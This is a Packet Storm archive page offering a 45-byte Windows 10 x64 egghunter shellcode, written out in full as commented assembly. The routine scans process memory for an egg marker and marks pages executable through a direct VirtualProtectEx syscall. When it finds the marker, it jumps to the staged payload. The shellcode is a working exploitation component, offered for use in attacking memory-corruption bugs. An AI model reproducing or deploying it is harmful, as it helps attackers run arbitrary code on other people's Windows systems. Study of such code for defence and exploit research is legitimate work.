ignore security and it'll go away

Windows 10 x64 Egghunter Shellcode

Windows 10 x64 Egghunter Shellcode
Posted Apr 6, 2017
Authored by Peter Baris

45 bytes small Windows 10 x64 egghunter shellcode.

tags | shellcode
systems | windows
MD5 | 6552b6fbb3c0d7d45075d31bac77a69e

Windows 10 x64 Egghunter Shellcode

Change Mirror Download
PUBLIC Win10egghunterx64

.code

Win10egghunterx64 PROC

_start:
push 7fh
pop rdi ; RDI is nonvolatile, so it will be preserved after syscalls

_setup:
inc rdi ; parameter 1 - lpAddress - counter
mov r9b,40h ; parameter 3 - flNewProtect - 0x40 PAGE_EXECUTE_READWRITE
pop rsi ; Stack alignment before the stack setup
pop rsi
push rdi
push rsp
pop rdx ; pointer to lpAddress
push 08h ; parameter 2 - dwSize 0x8
push rsp
pop r8 ; pointer to dwSize going to r8 - can be exchanged with mov r8,rsp
mov [rdx+20h],rsp ; parameter 4 - lpflOldprotect
dec r10 ; parameter 5 - hProcess - the handle will be -1, if not set you'll get a c0000008 error
_VirtualProtectEx:

push 50h ; 0x50h for Windows 10 and Windows Server 2016 x64, 0x4Dh for Windows 7 family
pop rax
syscall

_rc_check:

cmp al,01h ; check the response for non-allocated memory
jge _setup

_end: ; There won't be too many of these eggs in the memory

mov eax, 042303042h ; the egg
scasd
jnz _setup
jmp rdi

Win10egghunterx64 ENDP
END

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    2 Files
  • 23
    Oct 23rd
    16 Files
  • 24
    Oct 24th
    4 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close